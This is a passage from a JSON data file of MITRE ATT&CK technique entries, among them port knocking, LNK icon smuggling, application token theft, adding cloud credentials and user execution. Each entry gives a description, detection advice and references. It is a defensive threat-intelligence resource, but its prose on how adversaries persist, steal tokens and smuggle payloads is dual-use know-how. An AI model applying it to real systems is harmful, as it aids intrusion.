"Google Workspace"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8861073d-d1b8-4941-82ce-dce621d398f0", "created": "2023-02-21T19:38:13.371Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1021/007", "external_id": "T1021.007"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Port Knocking", "description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\n\nThis technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", "created": "2020-07-01T18:23:25.002Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1205/001", "external_id": "T1205.001"}, {"source_name": "Hartrell cd00r 2002", "description": "Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.", "url": "https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-17T02:12:05.242Z", "name": "LNK Icon Smuggling", "description": "Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) include many metadata fields, including an icon location field (also known as the `IconEnvironmentDataBlock`) designed to specify the path to an icon file that is to be displayed for the LNK file within a host directory. \n\nAdversaries may abuse this LNK metadata to download malicious payloads. For example, adversaries have been observed using LNK files as phishing payloads to deliver malware. Once invoked (e.g., [Malicious File](https://attack.mitre.org/techniques/T1204/002)), payloads referenced via external URLs within the LNK icon location field may be downloaded. These files may also then be invoked by [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)/[System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218) arguments within the target path field of the LNK.(Citation: Unprotect Shortcut)(Citation: Booby Trap Shortcut 2017)\n\nLNK Icon Smuggling may also be utilized post compromise, such as malicious scripts executing an LNK on an infected host to download additional malicious payloads. \n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Michael Raggi @aRtAGGI", "Andrew Northern, @ex_raritas", "Gregory Lesnewich, @greglesnewich"], "x_mitre_deprecated": false, "x_mitre_detection": "\n", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--887274fc-2d63-4bdc-82f3-fae56d1d5fdc", "created": "2023-09-29T15:28:42.409Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1027/012", "external_id": "T1027.012"}, {"source_name": "Unprotect Shortcut", "description": "Unprotect Project. (2019, March 18). Shortcut Hiding. Retrieved October 3, 2023.", "url": "https://unprotect.it/technique/shortcut-hiding/"}, {"source_name": "Booby Trap Shortcut 2017", "description": "Weyne, F. (2017, April). Booby trap a shortcut with a backdoor. Retrieved October 3, 2023.", "url": "https://www.uperesia.com/booby-trapped-shortcut"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-01-16T22:47:59.395Z", "name": "Web Services", "description": "Adversaries may register for web services\u00a0that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: FireEye APT29) By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Dor Edry, Microsoft"], "x_mitre_deprecated": false, "x_mitre_detection": "Once adversaries leverage the web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54", "created": "2020-10-01T00:50:29.936Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1583/006", "external_id": "T1583.006"}, {"source_name": "FireEye APT29", "description": "FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.", "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf"}, {"source_name": "ThreatConnect Infrastructure Dec 2020", "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-03-24T19:41:54.832Z", "name": "Steal Application Access Token", "description": "Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.\n\nFor example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container\u2019s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts) Similarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.(Citation: Cider Security Top 10 CICD Security Risks) If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges.\n\nToken theft can also occur through social engineering, in which case user action may be required to grant access. OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. \n \nAdversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)\n\nApplication access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user. \n\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Suzy Schapperle - Microsoft Azure Red Team", "Shailesh Tiwary (Indian Army)", "Mark Wee", "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)", "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)", "Ram Pliskin, Microsoft Azure Security Center", "Jack Burns, HubSpot"], "x_mitre_deprecated": false, "x_mitre_detection": "Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a \u201cHigh severity app permissions\u201d policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.\n\nSecurity analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app\u2019s purpose, or apps with old \u201cLast authorized\u201d fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.\n\nAdministrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["SaaS", "Office 365", "Azure AD", "Google Workspace", "Containers"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--890c9858-598c-401d-a4d5-c67ebcdd703a", "created": "2019-09-04T15:54:25.684Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1528", "external_id": "T1528"}, {"source_name": "Amnesty OAuth Phishing Attacks, August 2019", "description": "Amnesty International. (2019, August 16). Evolving Phishing Attacks Targeting Journalists and Human Rights Defenders from the Middle-East and North Africa. Retrieved October 8, 2019.", "url": "https://www.amnesty.org/en/latest/research/2019/08/evolving-phishing-attacks-targeting-journalists-and-human-rights-defenders-from-the-middle-east-and-north-africa/"}, {"source_name": "Auth0 Understanding Refresh Tokens", "description": "Auth0 Inc.. (n.d.). Understanding Refresh Tokens. Retrieved December 16, 2021.", "url": "https://auth0.com/learn/refresh-tokens/"}, {"source_name": "Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019", "description": "Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.", "url": "https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/"}, {"source_name": "Cider Security Top 10 CICD Security Risks", "description": "Daniel Krivelevich and Omer Gil. (n.d.). Top 10 CI/CD Security Risks. Retrieved March 24, 2024.", "url": "https://www.cidersecurity.io/top-10-cicd-security-risks/"}, {"source_name": "Trend Micro Pawn Storm OAuth 2017", "description": "Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019.", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks"}, {"source_name": "Kubernetes Service Accounts", "description": "Kubernetes. (2022, February 26). Configure Service Accounts for Pods. Retrieved April 1, 2022.", "url": "https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/"}, {"source_name": "Microsoft - Azure AD Identity Tokens - Aug 2019", "description": "Microsoft. (2019, August 29). Microsoft identity platform access tokens. Retrieved September 12, 2019.", "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens"}, {"source_name": "Microsoft - Azure AD App Registration - May 2019", "description": "Microsoft. (2019, May 8). Quickstart: Register an application with the Microsoft identity platform. Retrieved September 12, 2019.", "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app"}, {"source_name": "Microsoft - OAuth Code Authorization flow - June 2019", "description": "Microsoft. (n.d.). Microsoft identity platform and OAuth 2.0 authorization code flow. Retrieved September 12, 2019.", "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow"}, {"source_name": "Microsoft Identity Platform Protocols May 2019", "description": "Microsoft. (n.d.). Retrieved September 12, 2019.", "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Spearphishing Attachment", "description": "Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Philip Winther", "Sebastian Salla, McAfee", "Robert Simmons, @MalwareUtkonos"], "x_mitre_detection": "Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc", "created": "2020-10-02T17:08:57.386Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1598/002", "external_id": "T1598.002"}, {"source_name": "Sophos Attachment", "description": "Ducklin, P. (2020, October 2). Serious Security: Phishing without links \u2013 when phishers bring along their own web pages. Retrieved October 20, 2020.", "url": "https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/"}, {"source_name": "GitHub Phishery", "description": "Ryan Hanson. (2016, September 24). phishery. Retrieved October 23, 2020.", "url": "https://github.com/ryhanson/phishery"}, {"source_name": "Microsoft Anti Spoofing", "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.", "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide"}, {"source_name": "ACSC Email Spoofing", "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.", "url": "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-02-28T14:35:00.862Z", "name": "Additional Cloud Credentials", "description": "Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.\n\nFor example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal\u2019s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) \n\nIn AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials to [Forge Web Credentials](https://attack.mitre.org/techniques/T1606) tied to the permissions of the original user account. These temporary credentials may remain valid for the duration of their lifetime even if the original account\u2019s API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation Persistence)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Expel", "Oleg Kolesnikov, Securonix", "Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)", "Zur Ulianitzky, XM Cyber", "Alex Soler, AttackIQ", "Dylan Silva, AWS Security", "Arad Inbar, Fidelis Security"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS", "Azure AD", "SaaS"], "x_mitre_version": "2.7", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", "created": "2020-01-19T16:10:15.008Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1098/001", "external_id": "T1098.001"}, {"source_name": "Crowdstrike AWS User Federation Persistence", "description": " Vaishnav Murthy and Joel Eng. (2023, January 30). How Adversaries Can Persist with AWS User Federation. Retrieved March 10, 2023.", "url": "https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/"}, {"source_name": "Expel IO Evil in AWS", "description": "A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.", "url": "https://expel.io/blog/finding-evil-in-aws/"}, {"source_name": "SpecterOps Azure Privilege Escalation", "description": "Andy Robbins. (2021, October 12). Azure Privilege Escalation via Service Principal Abuse. Retrieved April 1, 2022.", "url": "https://posts.specterops.io/azure-privilege-escalation-via-service-principal-abuse-210ae2be2a5"}, {"source_name": "Demystifying Azure AD Service Principals", "description": "Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service Principals. Retrieved January 19, 2020.", "url": "https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/"}, {"source_name": "GCP SSH Key Add", "description": "Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved October 1, 2020.", "url": "https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add"}, {"source_name": "Blue Cloud of Death Video", "description": "Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming Azure. Retrieved November 21, 2019.", "url": "https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815"}, {"source_name": "Blue Cloud of Death", "description": "Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming Azure. Retrieved October 23, 2019.", "url": "https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1"}, {"source_name": "Microsoft SolarWinds Customer Guidance", "description": "MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020.", "url": "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/"}, {"source_name": "Expel Behind the Scenes", "description": "S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020, July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved October 1, 2020.", "url": "https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/"}, {"source_name": "Sysdig ScarletEel 2.0", "description": "SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto. (2023, July 11). SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto. Retrieved July 12, 2023.", "url": "https://sysdig.com/blog/scarleteel-2-0/"}, {"source_name": "Rhino Security Labs AWS Privilege Escalation", "description": "Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation \u2013 Methods and Mitigation. Retrieved May 27, 2022.", "url": "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:07.653Z", "name": "Default Credentials", "description": "Adversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed. (Citation: Keith Stouffer May 2015)\n\nDefault credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means. Adversaries may leverage default credentials that have not been properly modified or disabled.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Network Traffic: Network Traffic Content", "Logon Session: Logon Session Creation"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0812", "external_id": "T0812"}, {"source_name": "Keith Stouffer May 2015", "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-12T03:46:49.507Z", "name": "User Execution", "description": "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).\n\nWhile [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).\n\nAdversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)\n\nFor example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Oleg Skulkin, Group-IB", "Goldstein Menachem"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS", "IaaS", "Containers"], "x_mitre_version": "1.6", "x_mitre_data_sources": [], "x_mitre_remote_support": false, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1204", "external_id": "T1204"}, {"source_name": "Krebs Discord Bookmarks 2023", "description": "Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious Bookmarks. Retrieved January 2, 2024.", "url": "https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/"}, {"source_name": "Telephone Attack Delivery", "description": "Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November 4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery. Retrieved January 5, 2022.", "url": "https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-delivery"}, {"source_name": "Talos Roblox Scam 2023", "description": "Tiago Pereira. (2023, November 2). Attackers use JavaScript URLs, API forms and more to scam users in popular online game \u201cRoblox\u201d. Retrieved January 2, 2024.", "url": "https://blog.talosintelligence.com/roblox-scam-overview/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-11-08T14:00:00.188Z", "name": "Internal Defacement", "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor internal and websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet 